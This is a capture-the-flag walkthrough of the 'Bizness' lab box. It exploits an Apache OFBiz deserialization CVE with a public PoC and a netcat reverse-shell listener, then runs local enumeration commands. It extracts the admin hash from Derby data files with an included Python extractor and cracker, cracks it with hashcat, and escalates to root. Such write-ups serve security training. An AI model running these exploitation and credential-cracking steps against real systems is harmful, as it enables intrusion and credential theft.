Bizness
  • Easy rated box
  • Web application built on the Apache OFBiz framework

Enumeration

nmap -sCV -p- --min-rate 10000 <ip-addr>   # all 65535 TCP ports, default scripts and version detection


The web server redirects to bizness.htb, so I added the name to my /etc/hosts file:

echo "10.10.11.252 bizness.htb" | sudo tee -a /etc/hosts

After visiting the site, I ran a quick directory brute-force and found several endpoints.

They all lead to a login page, and the footer of each login page gives away both the framework and the version: Apache OFBiz 18.12.


A quick search in my favorite vulnerability database turns up two relevant entries, both leading to RCE: CVE-2023-49070, a pre-authentication Java deserialization bug in the /webtools/control/xmlrpc endpoint (fixed in 18.12.10), and CVE-2023-51467, an authentication bypass that let the same attack through after that fix (fixed in 18.12.11).


Exploitation

For the exploit I used abdoghazy2015's PoC for CVE-2023-49070. Before running it, switch to OpenJDK 11, because the PoC builds its payload with ysoserial and that was developed and tested under Java 11; ysoserial itself also has to be downloaded.

sudo update-alternatives --config java      # select OpenJDK 11 for ysoserial
nc -nvlp 4444                               # listener for the reverse shell, in a second terminal
python3 exploit.py https://bizness.htb shell <your-ip>:<your-port>


Post Exploitation

Basic system enumeration from the ofbiz shell:

cat /etc/hosts                                       # other hosts the box knows about
printenv                                             # credentials or paths leaked through the environment
ps aux | grep root                                   # services running as root
netstat -tulpn                                       # listening ports, including localhost-only ones
find / -type f -user root -perm -4000 2>/dev/null    # SUID binaries owned by root

Nothing interesting came up, except that ofbiz is the only user account that was created on the box.

I also noticed the application uses Derby as its DBMS. Apache OFBiz ships with embedded Derby as the default, and the UserLogin table in that database stores the hashed passwords of the OFBiz users, so there is a good chance the admin's password is reused for root.


/opt/ofbiz/runtime/data/derby/ofbiz/seg0 contains a lot of .dat files, and this was probably the most painful part of the box. The command below searches them as binary (grep -a) and revealed the hashed password next to the admin record:

cat * | grep -a 'admin'


This value cannot be fed to john or hashcat as-is; to understand the encoding we need to look at the source code that produces it (HashCrypt.java in the OFBiz source).

The short version: OFBiz stores a password as $SHA$<salt>$<digest>, where the digest is SHA-1 over the salt followed by the password, encoded as URL-safe base64 without padding. So we base64url-decode the digest, convert it to hex, and hand it to hashcat as sha1($salt.$pass) (mode 120) in this format:

hash:salt

For the decoding and hex conversion I used CyberChef.

I then used hashcat to crack the password:

hashcat -m 120 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt

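To make the Derby search and the hash conversion above repeatable, here is an added example covering both steps (my code, not the post's and not OFBiz's): it scans raw seg0/*.dat bytes for HashCrypt strings of the form $ALGO$salt$digest, turns each one into the hex:salt line hashcat expects together with the matching mode, and re-implements the digest so a candidate password can be checked locally. BIZNESS_HASH is the hash from the hashcat line above reassembled into the stored form (base64url of the hex digest, salt d); SAMPLE_PAGE is a constructed stand-in for a Derby page, and the second record in it, with the password letmein, is invented for the demonstration.

```python
"""Added example: extract OFBiz HashCrypt password strings from raw Derby
data files, convert them for hashcat, and verify candidate passwords."""
import base64
import hashlib
import re
from typing import Iterable, Iterator, Optional, Tuple

# OFBiz (org.apache.ofbiz.base.crypto.HashCrypt) stores a password as
#   $<ALGO>$<salt>$<digest>
# where digest = base64url(ALGO(salt || password)) with the '=' padding removed.
# The string is stored unchanged in the VARCHAR column, so it shows up verbatim
# inside Derby's seg0/*.dat pages and a raw byte scan is enough to find it.
HASH_RE = re.compile(rb"\$(SHA(?:-1|-256|-512)?|MD5)\$([^$\x00-\x20]{0,32})\$([A-Za-z0-9_.\-]{16,})")

# Java MessageDigest name -> (hashlib name, hashcat mode for ALGO($salt.$pass))
ALGOS = {
    "SHA": ("sha1", 120), "SHA-1": ("sha1", 120),
    "SHA-256": ("sha256", 1420), "SHA-512": ("sha512", 1720),
    "MD5": ("md5", 20),
}

# Hash from this box: the page's hashcat line (hex digest, salt 'd') in stored form.
BIZNESS_HASH = "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"


def find_hashes(blob: bytes) -> Iterator[str]:
    """Yield every HashCrypt string embedded in a raw (binary) Derby page."""
    for m in HASH_RE.finditer(blob):
        yield m.group(0).decode("ascii")


def parse(stored: str) -> Tuple[str, str, bytes]:
    """Split '$ALGO$salt$digest' into (algo, salt, raw digest bytes)."""
    m = re.fullmatch(r"\$([^$]+)\$([^$]*)\$([A-Za-z0-9_.\-]+)", stored)
    if not m:
        raise ValueError(f"not an OFBiz HashCrypt string: {stored!r}")
    algo, salt, digest = m.groups()
    if algo not in ALGOS:
        raise ValueError(f"unsupported digest algorithm: {algo}")
    # restore the '=' padding HashCrypt strips, then base64url-decode
    raw = base64.urlsafe_b64decode(digest + "=" * (-len(digest) % 4))
    return algo, salt, raw


def to_hashcat(stored: str) -> Tuple[str, int]:
    """Return (hash:salt line, mode) for 'hashcat -m <mode> <line> wordlist'."""
    algo, salt, raw = parse(stored)
    return f"{raw.hex()}:{salt}", ALGOS[algo][1]


def make_hash(algo: str, salt: str, password: str) -> str:
    """Re-implement HashCrypt: ALGO(salt || password), base64url, no padding."""
    h = hashlib.new(ALGOS[algo][0], salt.encode() + password.encode()).digest()
    return f"${algo}${salt}${base64.urlsafe_b64encode(h).rstrip(b'=').decode()}"


def verify(stored: str, password: str) -> bool:
    """Check one candidate password against a stored HashCrypt string."""
    algo, salt, raw = parse(stored)
    return hashlib.new(ALGOS[algo][0], salt.encode() + password.encode()).digest() == raw


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Tiny offline dictionary attack; hashcat is the real tool for rockyou-sized lists."""
    for word in wordlist:
        if verify(stored, word):
            return word
    return None


# Constructed stand-in for a Derby page: binary filler around two UserLogin-like records.
SAMPLE_PAGE = (
    b"\x00\x01\x02admin\x00\x00" + BIZNESS_HASH.encode()
    + b"\x00\x00flexadmin\x00" + make_hash("SHA", "d", "letmein").encode()   # invented record
    + b"\x00" * 8
)


if __name__ == "__main__":
    import sys
    paths = sys.argv[1:]          # e.g. /opt/ofbiz/runtime/data/derby/ofbiz/seg0/*.dat
    blobs = [open(p, "rb").read() for p in paths] or [SAMPLE_PAGE]
    for blob in blobs:
        for stored in find_hashes(blob):
            line, mode = to_hashcat(stored)
            print(f"{stored}  ->  hashcat -m {mode} '{line}' /usr/share/wordlists/rockyou.txt")
```

Point it at the real files with `python3 ofbiz_hashes.py /opt/ofbiz/runtime/data/derby/ofbiz/seg0/*.dat` (after copying them off the box); with no arguments it runs over the constructed page. The regex only admits the base64url alphabet after the last `$`, which is what stops the match at the binary byte that follows the stored string.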

We can now use this password to su to root

su -


Source: https://fuwari.vercel.app/posts/bizness/
Author: Balejin
Published: 2024-01-15